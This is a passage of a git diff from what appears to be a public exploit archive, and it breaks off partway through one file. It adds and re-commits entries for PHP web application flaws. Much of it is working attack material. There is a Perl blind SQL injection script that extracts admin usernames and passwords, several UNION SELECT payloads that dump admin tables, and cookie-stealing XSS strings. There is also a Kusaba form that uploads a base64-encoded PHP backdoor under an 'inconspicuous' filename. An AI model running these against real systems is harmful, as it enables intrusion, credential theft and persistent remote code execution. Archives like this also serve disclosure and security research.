ENT_QUOTES, 'EUC-JP'); +echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP'); diff --git a/platforms/php/remote/33415.php b/platforms/php/remote/33415.php new file mode 100755 index 000000000..48753e88a --- /dev/null +++ b/platforms/php/remote/33415.php @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/37389/info + +PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. + +Versions prior to PHP 5.2.12 are vulnerable. + + ? " +< html > +< head >< title > Shift_JIS test Shift_JIS test </ title> </ head> +< body > <Body> +< p >< a <P> <a title = " <?php echo htmlspecialchars ( $ _GET [ ' a1 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " title = "<? php echo htmlspecialchars ($ _GET [ 'a1'], ENT_QUOTES, 'SJIS')?>" href = " <?php echo htmlspecialchars ( $ _GET [ ' a2 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " > test </ a ></ p > href = "<? php echo htmlspecialchars ($ _GET [ 'a2'], ENT_QUOTES, 'SJIS')?>"> test </ a> </ p> +</ body > </ Body> +</ html > </ Html> diff --git a/platforms/php/webapps/23697.txt b/platforms/php/webapps/23697.txt index dc6cf99a7..c76a8766b 100755 --- a/platforms/php/webapps/23697.txt +++ b/platforms/php/webapps/23697.txt @@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/9664/info -Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. +Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well. diff --git a/platforms/php/webapps/33401.txt b/platforms/php/webapps/33401.txt new file mode 100755 index 000000000..18257fe01 --- /dev/null +++ b/platforms/php/webapps/33401.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37315/info + +Million Pixel Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Million Pixel Script 3, 3 Pro, and 3 Pro Lotto are vulnerable; other versions may also be affected. + + +The following example URI is available: + +http://www.example.com/?pa=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33404.txt b/platforms/php/webapps/33404.txt new file mode 100755 index 000000000..0060fe05d --- /dev/null +++ b/platforms/php/webapps/33404.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37329/info + +phpFaber CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following example is available: + +http://www.example.com/module.php?mod=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33406.txt b/platforms/php/webapps/33406.txt new file mode 100755 index 000000000..943a0c4b0 --- /dev/null +++ b/platforms/php/webapps/33406.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37351/info + +Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects versions prior to Horde 3.3.6. + +Note that additional products that use the Horde framework may also be vulnerable. + +http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid> \ No newline at end of file diff --git a/platforms/php/webapps/33407.txt b/platforms/php/webapps/33407.txt new file mode 100755 index 000000000..9a1c85415 --- /dev/null +++ b/platforms/php/webapps/33407.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37351/info + +Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects versions prior to Horde 3.3.6. + +Note that additional products that use the Horde framework may also be vulnerable. + +http://www.example.com/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid> \ No newline at end of file diff --git a/platforms/php/webapps/33408.txt b/platforms/php/webapps/33408.txt new file mode 100755 index 000000000..81d716a81 --- /dev/null +++ b/platforms/php/webapps/33408.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37351/info + +Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects versions prior to Horde 3.3.6. + +Note that additional products that use the Horde framework may also be vulnerable. + +http://www.example.com/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid> \ No newline at end of file diff --git a/platforms/php/webapps/33409.txt b/platforms/php/webapps/33409.txt new file mode 100755 index 000000000..759485507 --- /dev/null +++ b/platforms/php/webapps/33409.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37356/info + +Article Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following example is available: + +Username : X' or ' 1=1 +Password : X' or ' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/33410.txt b/platforms/php/webapps/33410.txt new file mode 100755 index 000000000..4313c278e --- /dev/null +++ b/platforms/php/webapps/33410.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/37371/info + +The Sections module for Drupal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +To exploit this issue, the attacker must have 'administer sections' permissions. + +Versions prior to Sections 5.x-1.3 and 6.x-1.3 are vulnerable. + +The following example input is available: + +<script>alert('xss');</script> \ No newline at end of file diff --git a/platforms/php/webapps/33411.txt b/platforms/php/webapps/33411.txt new file mode 100755 index 000000000..1203996f6 --- /dev/null +++ b/platforms/php/webapps/33411.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37380/info + +iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +iSupport 1.8 and prior versions are vulnerable. + +http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33412.txt b/platforms/php/webapps/33412.txt new file mode 100755 index 000000000..24f36317d --- /dev/null +++ b/platforms/php/webapps/33412.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37380/info + +iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +iSupport 1.8 and prior versions are vulnerable. + +http://www.example.com/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33413.txt b/platforms/php/webapps/33413.txt new file mode 100755 index 000000000..c626149ef --- /dev/null +++ b/platforms/php/webapps/33413.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37384/info + +Pluxml-Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Pluxml-Blog 4.2 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/core/admin/auth.php?p=1"> \ No newline at end of file diff --git a/platforms/php/webapps/33416.txt b/platforms/php/webapps/33416.txt new file mode 100755 index 000000000..175ccfc9a --- /dev/null +++ b/platforms/php/webapps/33416.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37393/info + +QuiXplorer is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +QuiXplorer 2.4.1beta is vulnerable; other versions may also be affected. + +http://www.example.com/path/?lang=../path/to/malicious_uploaded_code \ No newline at end of file diff --git a/platforms/php/webapps/33417.txt b/platforms/php/webapps/33417.txt new file mode 100755 index 000000000..bc9dd4df0 --- /dev/null +++ b/platforms/php/webapps/33417.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37394/info + +cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +cPanel versions prior to 11.25.0 are affected. + + +http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS + +http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO \ No newline at end of file diff --git a/platforms/php/webapps/33418.txt b/platforms/php/webapps/33418.txt new file mode 100755 index 000000000..0c5354fb0 --- /dev/null +++ b/platforms/php/webapps/33418.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37403/info + +The 'com_joomportfolio' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/ \ No newline at end of file diff --git a/platforms/php/webapps/33419.txt b/platforms/php/webapps/33419.txt new file mode 100755 index 000000000..3e0acb46f --- /dev/null +++ b/platforms/php/webapps/33419.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37408/info + +F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +F3Site 2009 is vulnerable; other versions may also be affected. + +http://www.example.com/mod/poll.php?GLOBALS[nlang]=[LFI%00] \ No newline at end of file diff --git a/platforms/php/webapps/33420.txt b/platforms/php/webapps/33420.txt new file mode 100755 index 000000000..c4597bfed --- /dev/null +++ b/platforms/php/webapps/33420.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37408/info + +F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +F3Site 2009 is vulnerable; other versions may also be affected. + +http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00] \ No newline at end of file diff --git a/platforms/php/webapps/3408.pl b/platforms/php/webapps/3408.pl index c7292eb1c..de520f9c1 100755 --- a/platforms/php/webapps/3408.pl +++ b/platforms/php/webapps/3408.pl @@ -1,84 +1,84 @@ -#!/usr/bin/perl -#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit -#[Coded by : ajann -#[Author : ajann -#[Contact : :( -#[S.Page : http://www.ajsquare.com -#[Dork : "/subcat.php?cate_id=" -#[$$ : 250.00 USD -#[.. : ajann,Turkey - -use IO::Socket; -if(@ARGV < 1){ -print " -[======================================================================== -[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit -[// Usage: exploit.pl [target] -[// Example: exploit.pl victim.com -[// Example: exploit.pl victim.com -[// Vuln&Exp : ajann -[======================================================================== -"; -exit(); -} -#Local variables -$server = $ARGV[0]; -$server =~ s/(http:\/\/)//eg; -$host = "http://".$server; -$port = "80"; -$file = "/subcat.php?cate_id="; - -print "Script <DIR> : "; -$dir = <STDIN>; -chop ($dir); - -if ($dir =~ /exit/){ -print "-- Exploit Failed[You Are Exited] \n"; -exit(); -} - -if ($dir =~ /\//){} -else { -print "-- Exploit Failed[No DIR] \n"; -exit(); - } - - -$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list"; -$target = $host.$dir.$file.$target; - -#Writing data to socket -print "+**********************************************************************+\n"; -print "+ Trying to connect: $server\n"; -$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; -print $socket "GET $target HTTP/1.1\n"; -print $socket "Host: $server\n"; -print $socket "Accept: */*\n"; -print $socket "Connection: close\n\n"; -print "+ Connected!...\n"; -#Getting -while($answer = <$socket>) { -if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){ -print "+ Exploit succeed! Getting admin information.\n"; -print "+ ---------------- +\n"; -print "+ Username: $1\n"; -} - -if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){ -print "+ Password: $1\n"; -} - -if ($answer =~ /Syntax error/) { -print "+ Exploit Failed : ( \n"; -print "+**********************************************************************+\n"; -exit(); -} - -if ($answer =~ /Internal Server Error/) { -print "+ Exploit Failed : ( \n"; -print "+**********************************************************************+\n"; -exit(); -} - } - -# milw0rm.com [2007-03-04] +#!/usr/bin/perl +#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit +#[Coded by : ajann +#[Author : ajann +#[Contact : :( +#[S.Page : http://www.ajsquare.com +#[Dork : "/subcat.php?cate_id=" +#[$$ : 250.00 USD +#[.. : ajann,Turkey + +use IO::Socket; +if(@ARGV < 1){ +print " +[======================================================================== +[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit +[// Usage: exploit.pl [target] +[// Example: exploit.pl victim.com +[// Example: exploit.pl victim.com +[// Vuln&Exp : ajann +[======================================================================== +"; +exit(); +} +#Local variables +$server = $ARGV[0]; +$server =~ s/(http:\/\/)//eg; +$host = "http://".$server; +$port = "80"; +$file = "/subcat.php?cate_id="; + +print "Script <DIR> : "; +$dir = <STDIN>; +chop ($dir); + +if ($dir =~ /exit/){ +print "-- Exploit Failed[You Are Exited] \n"; +exit(); +} + +if ($dir =~ /\//){} +else { +print "-- Exploit Failed[No DIR] \n"; +exit(); + } + + +$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list"; +$target = $host.$dir.$file.$target; + +#Writing data to socket +print "+**********************************************************************+\n"; +print "+ Trying to connect: $server\n"; +$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; +print $socket "GET $target HTTP/1.1\n"; +print $socket "Host: $server\n"; +print $socket "Accept: */*\n"; +print $socket "Connection: close\n\n"; +print "+ Connected!...\n"; +#Getting +while($answer = <$socket>) { +if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){ +print "+ Exploit succeed! Getting admin information.\n"; +print "+ ---------------- +\n"; +print "+ Username: $1\n"; +} + +if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){ +print "+ Password: $1\n"; +} + +if ($answer =~ /Syntax error/) { +print "+ Exploit Failed : ( \n"; +print "+**********************************************************************+\n"; +exit(); +} + +if ($answer =~ /Internal Server Error/) { +print "+ Exploit Failed : ( \n"; +print "+**********************************************************************+\n"; +exit(); +} + } + +# milw0rm.com [2007-03-04] diff --git a/platforms/php/webapps/5591.txt b/platforms/php/webapps/5591.txt index 0c9094f68..b88c55964 100755 --- a/platforms/php/webapps/5591.txt +++ b/platforms/php/webapps/5591.txt @@ -1,49 +1,49 @@ ---==+================================================================================+==-- ---==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- ---==+================================================================================+==-- - - - -Discovered By: t0pP8uZz -Discovered On: 12 MAY 2008 -Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1 -DORK: inurl:"classifide_ad.php" - - - -Vendor Has Not Been Notified! - - - -DESCRIPTION: - -AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker, -to arbitrary inject mysql code/query. - -the below injection will display the admin credentials. - - - -SQL Injection's: - -http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/* - - - -NOTE/TIP: - -admin login is at /admin/ - - - -GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! - - -peace, t0pP8uZz - - ---==+================================================================================+==-- ---==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- ---==+================================================================================+==-- - -# milw0rm.com [2008-05-12] +--==+================================================================================+==-- +--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- +--==+================================================================================+==-- + + + +Discovered By: t0pP8uZz +Discovered On: 12 MAY 2008 +Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1 +DORK: inurl:"classifide_ad.php" + + + +Vendor Has Not Been Notified! + + + +DESCRIPTION: + +AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker, +to arbitrary inject mysql code/query. + +the below injection will display the admin credentials. + + + +SQL Injection's: + +http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/* + + + +NOTE/TIP: + +admin login is at /admin/ + + + +GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! + + +peace, t0pP8uZz + + +--==+================================================================================+==-- +--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- +--==+================================================================================+==-- + +# milw0rm.com [2008-05-12] diff --git a/platforms/php/webapps/5867.txt b/platforms/php/webapps/5867.txt index 84b2704df..29f73a945 100755 --- a/platforms/php/webapps/5867.txt +++ b/platforms/php/webapps/5867.txt @@ -1,40 +1,40 @@ -######################################################### -# -# Auction Web 2.0 SQL Injection Vulnerability -#======================================================== -# Author: Hussin X = -# = -# Home : www.tryag.cc/cc = -# = -# email: darkangel_g85[at]Yahoo[DoT]com = -# hussin.x[at]hotmail[DoT]com = -# = -#========================================================= -# HomE script : http://www.ajauctionpro.com/ajhome.php -# -# Demo : http://www.ajauctionpro.com/auction_web2.0/ -# -# DorK : Powered By AJ Auction Web -# DorK : Powered By Auction Web -# -########################################################## - -Exploit: - -http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin-- - - -Admin login - -admin/index.php - -################################################################################ -#####################################( Greetz )################################# -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA # -# mos_chori / Rafi / FAHD / Iraq Hackers / # -# # -#################################(and All IRAQIs)############################### -################################################################################ - -# milw0rm.com [2008-06-19] +######################################################### +# +# Auction Web 2.0 SQL Injection Vulnerability +#======================================================== +# Author: Hussin X = +# = +# Home : www.tryag.cc/cc = +# = +# email: darkangel_g85[at]Yahoo[DoT]com = +# hussin.x[at]hotmail[DoT]com = +# = +#========================================================= +# HomE script : http://www.ajauctionpro.com/ajhome.php +# +# Demo : http://www.ajauctionpro.com/auction_web2.0/ +# +# DorK : Powered By AJ Auction Web +# DorK : Powered By Auction Web +# +########################################################## + +Exploit: + +http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin-- + + +Admin login + +admin/index.php + +################################################################################ +#####################################( Greetz )################################# +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA # +# mos_chori / Rafi / FAHD / Iraq Hackers / # +# # +#################################(and All IRAQIs)############################### +################################################################################ + +# milw0rm.com [2008-06-19] diff --git a/platforms/php/webapps/6550.txt b/platforms/php/webapps/6550.txt index 2f45e8340..861ab31b4 100755 --- a/platforms/php/webapps/6550.txt +++ b/platforms/php/webapps/6550.txt @@ -1,14 +1,14 @@ -############################################################################################ -## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability -## POC : -## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password), -## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin-- -## Live Demo : -## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4 -## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 -## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 -## ,43,44,45,46,47,48,49,50,51+from+admin-- -############################################################################################ - -# milw0rm.com [2008-09-24] +############################################################################################ +## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability +## POC : +## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password), +## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 +## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin-- +## Live Demo : +## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4 +## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 +## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 +## ,43,44,45,46,47,48,49,50,51+from+admin-- +############################################################################################ + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6561.txt b/platforms/php/webapps/6561.txt index 51cef4f5b..b42621a8e 100755 --- a/platforms/php/webapps/6561.txt +++ b/platforms/php/webapps/6561.txt @@ -1,34 +1,34 @@ -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - Xss /Remote SQL injection - -Script : Aj auction platinum2 , last version -Site : http://www.ajauctionpro.com -Dork : Powered By AJ Auction -Demo : http://www.ajauctionpro.com/ajauction_platinum2/ -[ SQL injection ] -========================================================================= -EXP file: Script path /sellers_othersitem.php?seller_id= - -SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin-- - -[Xss] -========================================================================= -EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script> -========================================================================= -ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers - - -thanx str0ke/* - -# milw0rm.com [2008-09-25] +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + Xss /Remote SQL injection + +Script : Aj auction platinum2 , last version +Site : http://www.ajauctionpro.com +Dork : Powered By AJ Auction +Demo : http://www.ajauctionpro.com/ajauction_platinum2/ +[ SQL injection ] +========================================================================= +EXP file: Script path /sellers_othersitem.php?seller_id= + +SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin-- + +[Xss] +========================================================================= +EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script> +========================================================================= +ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers + + +thanx str0ke/* + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6711.htm b/platforms/php/webapps/6711.htm index 4e165eb1f..9bd2f0f28 100755 --- a/platforms/php/webapps/6711.htm +++ b/platforms/php/webapps/6711.htm @@ -1,28 +1,28 @@ -<!-- -9 Oct 2008 -Kusaba <= 1.0.4 Remote Code Execution Exploit #2 -Sausage <tehsausage@gmail.com> - -Will work if they have left the load_receiver.php script un-edited. - -After execution: (Yes these are the exact URLs) -http://www.kusaba.image.board/url/change this to the same value as your -KU_ROOTDIRpost.php?pc=print "Hello"; -http://www.kusaba.image.board/url/change this to the same value as your -KU_ROOTDIRpost.php?sc=echo Hello ---> -<pre> -<form action="./load_receiver.php" method="POST"> -<input type="text" name="password" value="changeme"> <!-- Don't actually -change this, unless they have changed their password and you know it --> -<input type="text" name="type" value="direct"> -<input type="text" name="file" -value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw=="> -<!-- same backdoor from the paint_save.php exploit --> -<input type="text" name="targetname" value="post.php"> <!-- Any -inconspicuous filename will do --> - -<input type="submit" value="Exploit"> -</form> - -# milw0rm.com [2008-10-09] +<!-- +9 Oct 2008 +Kusaba <= 1.0.4 Remote Code Execution Exploit #2 +Sausage <tehsausage@gmail.com> + +Will work if they have left the load_receiver.php script un-edited. + +After execution: (Yes these are the exact URLs) +http://www.kusaba.image.board/url/change this to the same value as your +KU_ROOTDIRpost.php?pc=print "Hello"; +http://www.kusaba.image.board/url/change this to the same value as your +KU_ROOTDIRpost.php?sc=echo Hello +--> +<pre> +<form action="./load_receiver.php" method="POST"> +<input type="text" name="password" value="changeme"> <!-- Don't actually +change this, unless they have changed their password and you know it --> +<input type="text" name="type" value="direct"> +<input type="text" name="file" +value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw=="> +<!-- same backdoor from the paint_save.php exploit --> +<input type="text" name="targetname" value="post.php"> 